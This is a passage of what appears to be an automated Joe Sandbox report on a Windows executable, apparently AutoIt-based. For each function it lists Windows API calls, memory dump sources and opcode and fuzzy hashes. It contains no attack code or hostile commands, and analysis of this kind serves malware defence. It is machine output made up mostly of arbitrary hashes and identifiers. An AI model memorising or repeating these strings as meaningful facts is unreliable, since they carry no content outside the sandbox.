                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006E56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: f3e44023dc378a5600e32f3d40b962fcb92df83d0ddddc77dbbea77990f44891
                    • Instruction ID: 8b8f929ee40be2f3773b5683105485a0bf7ea5e2c2605fc29f3cde53a0305920
                    • Opcode Fuzzy Hash: f3e44023dc378a5600e32f3d40b962fcb92df83d0ddddc77dbbea77990f44891
                    • Instruction Fuzzy Hash: F2F01D32241158FBE7315BA29C0DEEB7B7CEBC6B15F004269FA05D14609EA51A0186B9
                    Function 006E74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 006E74E5
                    • EnterCriticalSection.KERNEL32(?,?,00691044,?,?), ref: 006E74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00691044,?,?), ref: 006E7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00691044,?,?), ref: 006E7510
                      • Part of subcall function 006E6ED7: CloseHandle.KERNEL32(00000000,?,006E751D,?,00691044,?,?), ref: 006E6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006E7523
                    • LeaveCriticalSection.KERNEL32(?,?,00691044,?,?), ref: 006E752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: b2287fcaf78864bcc1438e5d35659059b90c92500f9ea794541e417b9ed38128
                    • Instruction ID: 9b589914cef7b14a4eaf5c4605eedd387f9558e7fd3312fb22ebedaedc30eb1f
                    • Opcode Fuzzy Hash: b2287fcaf78864bcc1438e5d35659059b90c92500f9ea794541e417b9ed38128
                    • Instruction Fuzzy Hash: F6F05E3A145712EBDB216B64FC8C9EF7B2AFF45302B004631F202918B4CF795801CB94
                    Function 006D8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006D8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 006D8E8B
                    • CloseHandle.KERNEL32(?), ref: 006D8E94
                    • CloseHandle.KERNEL32(?), ref: 006D8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006D8EA5
                    • HeapFree.KERNEL32(00000000), ref: 006D8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 35a66ecedadf9979473009ec44c4057da6329210ac2d8012ebd463426dbc7b36
                    • Instruction ID: cb5e44ab73feb09edc4e15807da365f1642668ad0181d57fbc1b7ebc7d7b9cc7
                    • Opcode Fuzzy Hash: 35a66ecedadf9979473009ec44c4057da6329210ac2d8012ebd463426dbc7b36
                    • Instruction Fuzzy Hash: 4AE0C236004205FBDA115FE1EC0C90ABF79FB89722B508330F21981870CF3A9860DB98
                    Function 006D7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,0070FB80,000000FF,?,00000000,00000800,00000000,?,00712C7C,?), ref: 006D7C6F
                    • _memcmp.LIBCMT ref: 006D7C90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,q
                    • API String ID: 314563124-3492105362
                    • Opcode ID: af6e4e9f9b38a6308e8148c5ae0cd475ac81e3e9ea66f88adf71f590b9eba2ed
                    • Instruction ID: de1b7096b1064102490efc5903cdf6a29e8bf03512eff4209704a27217435fbc
                    • Opcode Fuzzy Hash: af6e4e9f9b38a6308e8148c5ae0cd475ac81e3e9ea66f88adf71f590b9eba2ed
                    • Instruction Fuzzy Hash: 05810A75E00109EFCB04DF94C984DEEB7BAFF89315F244199E506AB250EB71AE06CB61
                    Function 006F8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006F8928
                    • CharUpperBuffW.USER32(?,?), ref: 006F8A37
                    • VariantClear.OLEAUT32(?), ref: 006F8BAF
                      • Part of subcall function 006E7804: VariantInit.OLEAUT32(00000000), ref: 006E7844
                      • Part of subcall function 006E7804: VariantCopy.OLEAUT32(00000000,?), ref: 006E784D
                      • Part of subcall function 006E7804: VariantClear.OLEAUT32(00000000), ref: 006E7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 1fad4973766dc354ce3775f46d79b895c2f96d9469b330968baa08adaa2082f9
                    • Instruction ID: 6de1385af06a35ba1375ea01f27ad90ce23111ae37aaf1f695d6c0147c4949ad
                    • Opcode Fuzzy Hash: 1fad4973766dc354ce3775f46d79b895c2f96d9469b330968baa08adaa2082f9
                    • Instruction Fuzzy Hash: 3C919175604305DFC750EF28C48596BBBE6EF89714F04896EF9868B361DB30D906CB52
                    Function 006E2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • _memset.LIBCMT ref: 006E3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006E30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006E3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006E3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: d3c4fe173dfd3831460277ebb558f7647688c4450b9753cb838e8dc6f06937d4
                    • Instruction ID: 2285c43f743c401a38f35bbfae7a55d3df51d85e112968c691673d1c92d50bf4
                    • Opcode Fuzzy Hash: d3c4fe173dfd3831460277ebb558f7647688c4450b9753cb838e8dc6f06937d4
                    • Instruction Fuzzy Hash: 3A51263160A3A09FD724AF25C8486EBB7EAEF56350F040A2DF891D7391DB70CE448B56
                    Function 006E2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006E2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006E2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 006E2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00746890,00000000), ref: 006E2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 9200a15d721904429828bf14a565415a3d5d1c798ec361284d58cbd65aef79bd
                    • Instruction ID: c204ca93b69680fd15b1f73b1b2e33ecd53d668f9abdfdcec34c74db77ad9761
                    • Opcode Fuzzy Hash: 9200a15d721904429828bf14a565415a3d5d1c798ec361284d58cbd65aef79bd
                    • Instruction Fuzzy Hash: E241DE302063829FD724DF25CC54B5ABBEBEF85320F14461DFA6187291DB70E905CBA6
                    Function 006D9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006D93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006D9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 006D9439
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: c54ac738a9be74b41254bc3c8f9203f5fe5d4dfa6fca2ddfd4ff8711a2fd6a68
                    • Instruction ID: 79b4f3b63724118f4ade85801e4ea00abb73f05c8bc25ba76d46a1f208b33c3e
                    • Opcode Fuzzy Hash: c54ac738a9be74b41254bc3c8f9203f5fe5d4dfa6fca2ddfd4ff8711a2fd6a68
                    • Instruction Fuzzy Hash: 9921E471D00104AEDB14AB74CC858FFB7BADF05760B10421EF925973E1DB395E4A9664
                    Function 00706656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007066D0
                    • LoadLibraryW.KERNEL32(?), ref: 007066D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007066EC
                    • DestroyWindow.USER32(?), ref: 007066F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 2b5fb991c57286a0f6561d830240267107be477bef766ca2a78304bd811feb5a
                    • Instruction ID: 2746dc453fcf41c1d2f98a8de9219498529b77efb01d95e32d94d622e2b524d6
                    • Opcode Fuzzy Hash: 2b5fb991c57286a0f6561d830240267107be477bef766ca2a78304bd811feb5a
                    • Instruction Fuzzy Hash: 0421BB71200206EBEF104F64ECA0EBB37EDEB19328F104329F910921E0DB7A8C619760
                    Function 006E703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 006E705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 006E70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006E70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: b95613ef1409f46b5702c3b35268898880e33e68af9004fb98b4aea776ef8043
                    • Instruction ID: 7a563b15a5fe6b7296bb9b37ae007f2091e1c2881e308f37859c97e099b6f8fe
                    • Opcode Fuzzy Hash: b95613ef1409f46b5702c3b35268898880e33e68af9004fb98b4aea776ef8043
                    • Instruction Fuzzy Hash: B62181B4505349ABDB209F3ADC05A9A77A9BF54720F208619FCA0D72D0EBB099408B64
                    Function 006E710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 006E712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006E715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 006E716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006E71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 465b24989b3f74f9dbd6012259add08c8ce9695e0d6782540f524b4d30ff425b
                    • Instruction ID: 07220338cab655d435f40f535da049bcffea691c93deeae4573e1584e99d9a56
                    • Opcode Fuzzy Hash: 465b24989b3f74f9dbd6012259add08c8ce9695e0d6782540f524b4d30ff425b
                    • Instruction Fuzzy Hash: 4721A175505385ABDB209F6ADC08ADAB7AAAF55730F244719FCA0D33D0EB7098418B54
                    Function 006EAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006EAF13
                    • __swprintf.LIBCMT ref: 006EAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0070F910), ref: 006EAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 150448f2e70f02f4d209ce46cc9130edd1e352e4bec138fe7e96921a6afbec09
                    • Instruction ID: 1a917c16a0ecc87688f0c9eedca569c72e48fc7025a5a526ee5842c27568039b
                    • Opcode Fuzzy Hash: 150448f2e70f02f4d209ce46cc9130edd1e352e4bec138fe7e96921a6afbec09
                    • Instruction Fuzzy Hash: A521A174A00208AFCB10EF65CC85DEE7BB9EF89704B044169F909EB351DB71EA41CB65
                    Function 006DA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 006DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006DA399
                      • Part of subcall function 006DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006DA3AC
                      • Part of subcall function 006DA37C: GetCurrentThreadId.KERNEL32 ref: 006DA3B3
                      • Part of subcall function 006DA37C: AttachThreadInput.USER32(00000000), ref: 006DA3BA
                    • GetFocus.USER32 ref: 006DA554
                      • Part of subcall function 006DA3C5: GetParent.USER32(?), ref: 006DA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DA59D
                    • EnumChildWindows.USER32(?,006DA615), ref: 006DA5C5
                    • __swprintf.LIBCMT ref: 006DA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: b7ba49464353c10308c23cf40211083c63b06a04a4d5797cf57e0e61c7fbf0ab
                    • Instruction ID: 37865ff0095a8803ac532b8dcefef5a463ee70aa081b81fac7e54734dc90e6c3
                    • Opcode Fuzzy Hash: b7ba49464353c10308c23cf40211083c63b06a04a4d5797cf57e0e61c7fbf0ab
                    • Instruction Fuzzy Hash: 3011B771A04204FBDF507FA4DC85FEA777A9F48700F04417AF9089A252CA7499458B79
                    Function 006E2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 006E2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 198d917d636fa053e480d3660142a3488b3b9c5792556b00dad62386139223f5
                    • Instruction ID: 6af19026b2aa906545ce341b391dec78e11749e9c6212effa4957fedd4bdd3f4
                    • Opcode Fuzzy Hash: 198d917d636fa053e480d3660142a3488b3b9c5792556b00dad62386139223f5
                    • Instruction Fuzzy Hash: 9E113C7190020A9FDF40EFA4D8914EEB7B6BF56304F1085A8D89567392DB325D16CB50
                    Function 006FEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006FEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006FEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006FF07E
                    • CloseHandle.KERNEL32(?), ref: 006FF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 9053f269d65826dc2915a67d30303778df13f390b84cb6b70f6d4a9f227dcebc
                    • Instruction ID: 4763f9a01ada55a405bc94087876765af23991542bada31ec7eb46346d6f8d01
                    • Opcode Fuzzy Hash: 9053f269d65826dc2915a67d30303778df13f390b84cb6b70f6d4a9f227dcebc
                    • Instruction Fuzzy Hash: 448183716043009FD760EF24C886F7AB7E6AF48720F04891DF69ADB392DB71AC018B55
                    Function 007002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 007010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00700388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007003C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0070040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 0070043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00700447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
